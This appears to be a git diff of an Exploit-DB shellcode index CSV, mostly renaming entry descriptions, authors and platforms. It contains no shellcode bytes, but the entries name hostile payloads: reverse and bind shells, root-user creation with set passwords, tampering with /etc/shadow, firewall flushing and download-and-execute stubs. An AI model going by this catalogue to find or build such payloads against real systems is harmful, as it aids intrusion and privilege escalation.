-13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,linux_x86
+13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,$andman,shellcode,linux_x86
 13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
 13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
 13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
-13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,linux_x86
+13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
 13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
 13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
 13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
@ -355,8 +355,8 @@ id,file,description,date,author,type,platform
 13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
 13711,shellcodes/solaris_x86/13711.c,"Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",shellcode,solaris_x86
 13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86
-13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
-13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
+13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
+13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
 13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
 13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
 13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
@ -365,7 +365,7 @@ id,file,description,date,author,type,platform
 13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
 13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
-13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
+13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
 13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
 13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
 13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
@ -377,7 +377,7 @@ id,file,description,date,author,type,platform
 13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
 13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
 13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
-13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
+13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
 14014,shellcodes/windows_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,windows_x86
 14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
@ -392,7 +392,7 @@ id,file,description,date,author,type,platform
 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
 14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
-14235,shellcodes/linux/14235.c,"Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
+14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
 14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
 14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
 14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
@ -412,12 +412,12 @@ id,file,description,date,author,type,platform
 15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
-15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
+15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
 15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
 15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
-16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
+16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
 16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
 17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
@ -425,8 +425,8 @@ id,file,description,date,author,type,platform
 17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
-17371,shellcodes/linux_x86/17371.txt,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
-17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
+17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
+17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
 17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
 17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
 17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
@ -434,13 +434,13 @@ id,file,description,date,author,type,platform
 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
 18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4
 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
-18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
+18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
 18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
-18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
+18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
-18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
+18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
 18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
 20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
 21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
@ -463,11 +463,11 @@ id,file,description,date,author,type,platform
 40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
 34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
-34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
-34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
+34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
+34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
 34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
 34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
-35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
+35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
 35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
 35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
 35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
@ -507,7 +507,7 @@ id,file,description,date,author,type,platform
 37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
 37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
-37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86
+37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86
 37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
@ -522,7 +522,7 @@ id,file,description,date,author,type,platform
 38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
 38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
 38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
-38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
+38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
 38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
 38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
 38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
@ -578,7 +578,7 @@ id,file,description,date,author,type,platform
 40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
 40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
-40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
+40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
 40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
 40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
 40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
@ -593,9 +593,9 @@ id,file,description,date,author,type,platform
 40245,shellcodes/windows_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 40246,shellcodes/windows_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 40259,shellcodes/windows_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
-43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
-43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
+43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
+43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
+43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
 43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
 43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
 43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
@ -662,6 +662,59 @@ id,file,description,date,author,type,platform
 43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43664,shellcodes/linux_x86/43664.c,"Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
+43666,shellcodes/linux_x86/43666.c,"Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
+43668,shellcodes/linux_x86/43668.c,"Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)",2009-01-01,bob,shellcode,linux_x86
+43669,shellcodes/linux_x86/43669.c,"Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)",2009-01-01,bob,shellcode,linux_x86
+43670,shellcodes/linux_x86/43670.c,"Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)",2009-01-01,bob,shellcode,linux_x86
+43671,shellcodes/linux_x86/43671.c,"Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)",2009-01-01,bob,shellcode,linux_x86
+43672,shellcodes/generator/43672.c,"Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
+43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
+43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
+43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
+43677,shellcodes/linux_x86/43677.c,"Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
+43679,shellcodes/linux_x86/43679.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
+43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
+43681,shellcodes/linux_x86/43681.c,"Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
+43684,shellcodes/linux_x86/43684.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)",2009-01-01,agix,shellcode,linux_x86
+43685,shellcodes/linux_x86/43685.c,"Linux/x86 - Remote File Download Shellcode (42 bytes)",2009-01-01,"Jonathan Salwan",shellcode,linux_x86
+43686,shellcodes/linux_x86/43686.c,"Linux/x86 - CDRom Ejecting Shellcode (46 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+43687,shellcodes/linux_x86/43687.c,"Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes)",2009-05-31,gunslinger_,shellcode,linux_x86
+43688,shellcodes/linux_x86/43688.c,"Linux/x86 - exit(0) Shellcode (8 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+43689,shellcodes/linux_x86/43689.c,"Linux/x86 - sync Shellcode (6 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+43690,shellcodes/linux_x86/43690.c,"Linux/x86 - execve(/bin/sh_ -c_ ping localhost)  Shellcode (55 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
